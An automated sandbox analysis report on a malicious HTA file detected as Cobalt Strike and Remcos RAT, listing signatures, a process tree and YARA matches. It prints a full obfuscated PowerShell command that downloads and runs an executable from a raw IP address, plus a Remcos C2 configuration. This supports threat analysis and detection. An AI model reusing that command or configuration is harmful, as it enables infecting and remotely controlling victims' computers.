Edit tour
Windows
Analysis Report
newthingswithgreatupdateiongivenbestthingswithme.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 2504 cmdline:
mshta.exe "C:\Users\ user\Deskt op\newthin gswithgrea tupdateion givenbestt hingswithm e.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 4484 cmdline:
"C:\Window s\system32 \cmd.exe" "/C PoWeRs HelL -EX BYPass -nop -W 1 -C deVicecRE DeNtIaLDEP LOYmEnt.Ex E ; INVO kE-ExPRESs Ion($(iNVO Ke-eXprEsS IoN('[SYsT em.tEXT.eN CODing]'+[ cHAr]58+[c hAR]58+'UT F8.GeTSTrI nG([sySTEm .coNVErt]' +[cHAR]0X3 A+[CHar]58 +'fRomBasE 64StriNG(' +[cHAr]0X2 2+'JHJIQVp 5bkw1UG1uI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgID0gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gQURkLVRZU EUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW1 FTWJlUmRFZ kluaVRpT24 gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJ1tEb GxJbXBvcnQ oInVybG1vT i5kbEwiLCA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBDaGFyU 2V0ID0gQ2h hclNldC5Vb mljb2RlKV1 wdWJsaWMgc 3RhdGljIGV 4dGVybiBJb nRQdHIgVVJ MRG93bmxvY WRUb0ZpbGU oSW50UHRyI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEtidUt vVmpvYUxlL HN0cmluZyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBwWWZJL HN0cmluZyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBMa0ZHT 09RclBIUix 1aW50ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI FdzeE9URlF FZXAsSW50U HRyICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEF oWFEpOycgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5hTUU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgImlSR FN1IiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tTmFNZXNQY WNFICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIE5 sT0NzICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI C1QYXNzVGh ydTsgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgJ HJIQVp5bkw 1UG1uOjpVU kxEb3dubG9 hZFRvRmlsZ SgwLCJodHR wOi8vMTkyL jMuMTc5LjE 2Ni83NS9lY 29tZS5leGU iLCIkRW52O kFQUERBVEF cbmljZXRvb WVldHlvdXN 3ZWVldC5le GUiLDAsMCk 7U1RBUlQtU 2xFRXAoMyk 7aU52b0tFL WVYUFJlU1N Jb24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI iRFTlY6QVB QREFUQVxua WNldG9tZWV 0eW91c3dlZ WV0LmV4ZSI ='+[cHAR]0 x22+'))')) )" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2568 cmdline:
PoWeRsHelL -E X BY Pass -nop -W 1 - C de VicecREDeN tIaLDEPLOY mEnt.ExE ; INVOkE- ExPRESsIon ($(iNVOKe- eXprEsSIoN ('[SYsTem. tEXT.eNCOD ing]'+[cHA r]58+[chAR ]58+'UTF8. GeTSTrInG( [sySTEm.co NVErt]'+[c HAR]0X3A+[ CHar]58+'f RomBasE64S triNG('+[c HAr]0X22+' JHJIQVp5bk w1UG1uICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ID0gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgQU RkLVRZUEUg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLW1FTW JlUmRFZklu aVRpT24gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJ1tEbGxJ bXBvcnQoIn VybG1vTi5k bEwiLCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BDaGFyU2V0 ID0gQ2hhcl NldC5Vbmlj b2RlKV1wdW JsaWMgc3Rh dGljIGV4dG VybiBJbnRQ dHIgVVJMRG 93bmxvYWRU b0ZpbGUoSW 50UHRyICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IEtidUtvVm pvYUxlLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BwWWZJLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BMa0ZHT09R clBIUix1aW 50ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIFdz eE9URlFFZX AsSW50UHRy ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIEFoWF EpOycgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5hTUUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgImlSRFN1 IiAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAtTm FNZXNQYWNF ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIE5sT0 NzICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1Q YXNzVGhydT sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgJHJI QVp5bkw1UG 1uOjpVUkxE b3dubG9hZF RvRmlsZSgw LCJodHRwOi 8vMTkyLjMu MTc5LjE2Ni 83NS9lY29t ZS5leGUiLC IkRW52OkFQ UERBVEFcbm ljZXRvbWVl dHlvdXN3ZW VldC5leGUi LDAsMCk7U1 RBUlQtU2xF RXAoMyk7aU 52b0tFLWVY UFJlU1NJb2 4gICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIiRF TlY6QVBQRE FUQVxuaWNl dG9tZWV0eW 91c3dlZWV0 LmV4ZSI='+ [cHAR]0x22 +'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 4820 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\jxpeahvf \jxpeahvf. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 4228 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SC255.tmp" "c:\Users \user\AppD ata\Local\ Temp\jxpea hvf\CSC89F 653F7BE434 269AEE3287 9D026A860. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - nicetomeetyousweeet.exe (PID: 7088 cmdline:
"C:\Users\ user\AppDa ta\Roaming \nicetomee tyousweeet .exe" MD5: A2D03C5333BFECCA62720CD6EE3A4DC4) - WerFault.exe (PID: 1188 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 2060 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 656 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 2032 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 6044 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 712 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 3664 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 640 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 2936 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 2416 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 7068 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 5288 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 6044 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 5548 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 3152 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 4136 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 5172 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 792 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 5676 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2) - WerFault.exe (PID: 3796 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 088 -s 720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GJDISH", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
Click to see the 18 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 31 entries |
System Summary |
---|
Source: | Author: Michael Haag: |